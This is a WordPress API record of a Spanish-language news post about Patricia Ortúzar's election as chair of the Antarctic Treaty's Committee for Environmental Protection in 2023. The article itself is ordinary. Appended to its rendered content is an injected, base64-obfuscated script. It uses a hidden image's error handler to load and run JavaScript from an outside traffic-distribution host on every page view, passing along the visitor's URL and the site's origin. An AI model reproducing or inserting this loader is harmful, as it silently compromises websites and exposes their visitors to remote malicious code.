{"id":6844,"date":"2023-06-05T09:45:22","date_gmt":"2023-06-05T12:45:22","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6844"},"modified":"2025-08-13T15:59:35","modified_gmt":"2025-08-13T18:59:35","slug":"la-directora-nacional-del-antartico-presidira-el-principal-organo-asesor-sobre-temas-ambientales-del-sistema-del-tratado-antartico","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6844","title":{"rendered":"La Directora Nacional del Ant\u00e1rtico presidir\u00e1 el principal \u00f3rgano asesor sobre temas ambientales del Sistema del Tratado Ant\u00e1rtico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>El pasado 31 de mayo, la Lic.\u00a0<strong>Patricia Ort\u00fazar<\/strong>, Directora Nacional del Ant\u00e1rtico de la Canciller\u00eda Argentina,<strong>\u00a0<\/strong>fue elegida por aclamaci\u00f3n como Presidenta del Comit\u00e9 de Protecci\u00f3n Ambiental del Tratado Ant\u00e1rtico (CPA), en el marco de la 25\u00b0 Reuni\u00f3n de ese Comit\u00e9 y de la 45\u00b0 Reuni\u00f3n Consultiva, encuentros que se desarrollan en Helsinki, Finlandia, del 29 de mayo al 8 de junio del 2023.<\/em><\/h4>\n\n\n\n<p>Este Comit\u00e9 es el principal \u00f3rgano asesor sobre asuntos ambientales del Sistema del Tratado Ant\u00e1rtico y fue establecido por el Protocolo al Tratado Ant\u00e1rtico sobre Protecci\u00f3n Ambiental conocido como \u201cProtocolo de Madrid\u201d, que entr\u00f3 en vigor en 1998 y del cual la Argentina es pa\u00eds signatario originario.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg\" alt=\"\" class=\"wp-image-6825\" width=\"216\" height=\"304\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg 727w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-213x300.jpg 213w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-768x1082.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1091x1536.jpg 1091w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-696x980.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1068x1504.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-298x420.jpg 298w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-320x451.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-480x676.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-800x1127.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007.jpg 1136w\" sizes=\"(max-width: 216px) 100vw, 216px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Oportunamente el Canciller&nbsp;<strong>Santiago Cafiero<\/strong>&nbsp;destac\u00f3 al Protocolo de Madrid como un instrumento central del sistema del Tratado Ant\u00e1rtico para proteger el ambiente y los ecosistemas ant\u00e1rticos en un mundo que, desde hace algunas d\u00e9cadas, mira con creciente inter\u00e9s a la actividad humana y el acceso a los recursos naturales en esa regi\u00f3n. Por su parte, el Secretario de Malvinas, Ant\u00e1rtida y Atl\u00e1ntico Sur&nbsp;<strong>Guillermo Carmona<\/strong>&nbsp;subray\u00f3 el papel protag\u00f3nico de la Argentina en la Ant\u00e1rtida con m\u00e1s de 119 a\u00f1os de presencia permanente e ininterrumpida, lo cual le ha permitido testificar sobre las consecuencias adversas al ambiente ant\u00e1rtico de fen\u00f3menos globales como el cambio clim\u00e1tico.<\/p>\n\n\n\n<p>La Lic. Ort\u00fazar es, desde el 2020, Directora Nacional del Ant\u00e1rtico (DNA) -dependiente de la Secretar\u00eda de Malvinas, Ant\u00e1rtida y Atl\u00e1ntico Sur de la Canciller\u00eda- y se desempe\u00f1\u00f3 como Jefa del Programa de Gesti\u00f3n Ambiental y Turismo de dicha Direcci\u00f3n entre el 2012 y el 2020. Asimismo, representa a nuestro pa\u00eds en el Comit\u00e9 de Protecci\u00f3n Ambiental desde el 2010 y ejerci\u00f3 su Vicepresidencia Primera entre el 2016 y el 2022. Adicionalmente, actualmente se desempe\u00f1a como Vicepresidenta del Consejo de Administradores de Programas Ant\u00e1rticos Nacionales (COMNAP). Ser\u00e1 tambi\u00e9n la primera persona hispanoparlante en dirigir el CPA en sus 25 a\u00f1os de funcionamiento.<\/p>\n\n\n\n<p>Finalmente, Ort\u00fazar integra la Delegaci\u00f3n Argentina que participa de la mencionada Reuni\u00f3n Consultiva del Tratado Ant\u00e1rtico, cuya delegaci\u00f3n est\u00e1 encabezada por el Ministro&nbsp;<strong>Fausto L\u00f3pez Crozet<\/strong>, Director Nacional de Pol\u00edtica Exterior Ant\u00e1rtica.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pasado 31 de mayo, la Lic.\u00a0Patricia Ort\u00fazar, Directora Nacional del Ant\u00e1rtico de la Canciller\u00eda Argentina,\u00a0fue elegida por aclamaci\u00f3n como Presidenta del Comit\u00e9 de Protecci\u00f3n Ambiental del Tratado Ant\u00e1rtico (CPA), en el marco de la 25\u00b0 Reuni\u00f3n de ese Comit\u00e9 y de la 45\u00b0 Reuni\u00f3n Consultiva, encuentros que se desarrollan en Helsinki, Finlandia, del 29 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6845,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6844","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6844","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6844"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6844\/revisions"}],"predecessor-version":[{"id":10391,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6844\/revisions\/10391"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6845"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6844"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6844"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6844"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}